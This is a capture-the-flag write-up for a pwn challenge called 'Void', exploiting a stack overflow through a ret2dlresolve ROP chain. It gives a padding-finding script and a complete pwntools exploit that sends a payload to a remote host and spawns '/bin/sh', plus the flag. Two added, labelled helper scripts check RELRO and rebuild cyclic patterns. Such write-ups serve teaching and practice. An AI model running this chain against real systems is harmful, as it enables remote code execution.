Pwn - Void
Medium
Description
The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.
Solution

[checksec output]

The binary is very simple, with a vuln() function that has a clear stack buffer overflow.

Looking at the GOT, only read is available.

- There is no win function anywhere.
- There is no function like puts that could leak a libc address.
- There is a relatively large space to hold a payload (read(0, buf, 200)).

This suggests that we'll need to do a ret2dlresolve ROP chain.
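The chain that follows relies on lazy binding: the loader only sets up the PLT's runtime-resolution trampoline when imports are resolved on first call, and that is what lets a fake relocation entry get system resolved for us. A binary linked with -z now (Full RELRO) resolves every import at load time and seals the GOT read-only, so that path is not available. The script below, added here and not part of the original writeup, reads the program headers and dynamic section with only the standard library and reports the RELRO level the way checksec does; the tiny ELF images it builds are constructed test inputs, not the challenge binary, and the "./void" default path is only assumed from the writeup.

```python
import struct
import sys

# Added example, not part of the original writeup: report the RELRO level of a
# 64-bit little-endian ELF from its program headers and dynamic section.

ELF_MAGIC = b"\x7fELF"
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, 64 bytes
PHDR = "<IIQQQQQQ"           # Elf64_Phdr, 56 bytes
DYN = "<qQ"                  # Elf64_Dyn, 16 bytes


def relro_level(data: bytes) -> str:
    """Return 'No RELRO', 'Partial RELRO' or 'Full RELRO', like checksec."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF")
    hdr = struct.unpack_from(EHDR, data, 0)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]

    has_relro_segment = False
    dyn_off = dyn_size = None
    for i in range(e_phnum):
        p_type, _flags, p_offset, _va, _pa, p_filesz, _msz, _al = struct.unpack_from(
            PHDR, data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            has_relro_segment = True      # loader will mprotect this range read-only
        elif p_type == PT_DYNAMIC:
            dyn_off, dyn_size = p_offset, p_filesz

    if not has_relro_segment:
        return "No RELRO"

    # Full RELRO additionally needs BIND_NOW so the GOT is complete before it is sealed.
    bind_now = False
    if dyn_off is not None:
        for off in range(dyn_off, dyn_off + dyn_size, struct.calcsize(DYN)):
            d_tag, d_val = struct.unpack_from(DYN, data, off)
            if d_tag == DT_NULL:
                break
            if (d_tag == DT_BIND_NOW
                    or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW)
                    or (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW)):
                bind_now = True
    return "Full RELRO" if bind_now else "Partial RELRO"


def build_fake_elf(relro: bool, bind_now: bool) -> bytes:
    """Constructed minimal ELF64 image carrying only the headers relro_level() reads."""
    dyn = b""
    if bind_now:
        dyn += struct.pack(DYN, DT_FLAGS, DF_BIND_NOW)
    dyn += struct.pack(DYN, DT_NULL, 0)
    n_ph = 2 if relro else 1
    e_phoff = struct.calcsize(EHDR)
    dyn_off = e_phoff + n_ph * struct.calcsize(PHDR)
    phdrs = struct.pack(PHDR, PT_DYNAMIC, 6, dyn_off, 0, 0, len(dyn), len(dyn), 8)
    if relro:
        phdrs += struct.pack(PHDR, PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1)
    ident = ELF_MAGIC + bytes([2, 1, 1]) + bytes(9)   # ELFCLASS64, little-endian, EV_CURRENT
    ehdr = struct.pack(EHDR, ident, 3, 0x3E, 1, 0, e_phoff, 0, 0,
                       struct.calcsize(EHDR), struct.calcsize(PHDR), n_ph, 64, 0, 0)
    return ehdr + phdrs + dyn


if __name__ == "__main__":
    # "./void" is assumed to be the challenge binary; run as: python3 relro.py ./void
    path = sys.argv[1] if len(sys.argv) > 1 else "./void"
    with open(path, "rb") as f:
        print(path, relro_level(f.read()))
```

The two-step classification mirrors what checksec prints: a PT_GNU_RELRO segment alone gives Partial RELRO (the .got.plt stays writable for lazy binding), and BIND_NOW on top of it gives Full RELRO. Rebuilding with -Wl,-z,relro,-z,now is therefore the compile-time change that closes this particular resolution path.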
First, the code to find the padding needed to control rip:

```python
from pwn import *
import os

binary = context.binary = ELF("./void")
p = process(binary.path)
p.sendline(cyclic(1024, n=8))   # De Bruijn pattern: every 8-byte window is unique
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
# on x86-64 a ret to a non-canonical address faults with rsp still pointing at
# the bad return address, so the 8 bytes at rsp are the part of the pattern
# that landed on the saved rip
padding = cyclic_find(core.read(core.rsp, 8), n=8)
log.info('Padding: ' + str(padding) + " (" + hex(padding) + ")")
```

We find the padding needed to be 72 bytes. We then proceed with creating the dlresolve ROP chain using pwntools. While the concept is not so straightforward, the exploit is very easily written with pwntools. The entire exploit code is as simple as this:
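To make the padding step visible without a debugger, here is a small re-implementation of the idea behind pwntools' cyclic() and cyclic_find(). It is an added example, not code from the original writeup or from pwntools: the function names mirror pwntools but the code is our own, it uses the same lowercase alphabet and 8-byte window that the writeup uses, and the "crash" it searches is a constructed slice of the pattern standing in for core.read(core.rsp, 8).

```python
import string
import struct
from functools import lru_cache
from itertools import islice

# Added example, not part of the original writeup: a stdlib-only version of the
# cyclic pattern / offset lookup used to find the 72-byte padding.


def de_bruijn(alphabet: str, n: int):
    """Lazily yield a De Bruijn sequence B(k, n) over `alphabet` (FKM algorithm).
    Every window of n consecutive characters in the sequence is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


@lru_cache(maxsize=None)
def cyclic(length: int, n: int = 8, alphabet: str = string.ascii_lowercase) -> bytes:
    """First `length` bytes of the pattern; n is the unique-window size (8 on x86-64)."""
    return "".join(islice(de_bruijn(alphabet, n), length)).encode()


def cyclic_find(subseq, n: int = 8, alphabet: str = string.ascii_lowercase,
                max_length: int = 0x10000) -> int:
    """Offset of an n-byte window inside the pattern, or -1 if it is not found.
    Accepts the window as bytes/str, or as the integer a register held
    (interpreted little-endian, the way a core dump shows rip/rsp)."""
    if isinstance(subseq, int):
        subseq = struct.pack("<Q", subseq)[:n]
    if isinstance(subseq, str):
        subseq = subseq.encode()
    return cyclic(max_length, n, alphabet).find(subseq)


def padding_from_crash(bytes_at_rsp: bytes, n: int = 8) -> int:
    """Given the n bytes sitting at rsp when the ret faulted, return the padding
    that precedes the saved return address."""
    return cyclic_find(bytes_at_rsp, n)


if __name__ == "__main__":
    # Constructed stand-in for the crash: 72 bytes of buffer and saved rbp, then
    # the return address, all overwritten by the 1024-byte pattern sent to read().
    pattern = cyclic(1024, n=8)
    at_rsp = pattern[72:80]                  # what core.read(core.rsp, 8) would return
    print("Padding:", padding_from_crash(at_rsp))
```

The 8-byte window size matters: with n=4 (the default for 32-bit targets) the pattern repeats 4-byte windows every 26^4 bytes, so an 8-byte register value could not be located unambiguously.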
```python
from pwn import *

binary = context.binary = ELF("./void")
rop = ROP(binary)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(binary, symbol='system', args=['/bin/sh'])
rop.raw('A' * 72)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
# send payload
p = remote("178.62.64.13", 30663)
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
```

Flag: HTB{r3s0lv3_th3_d4rkn355}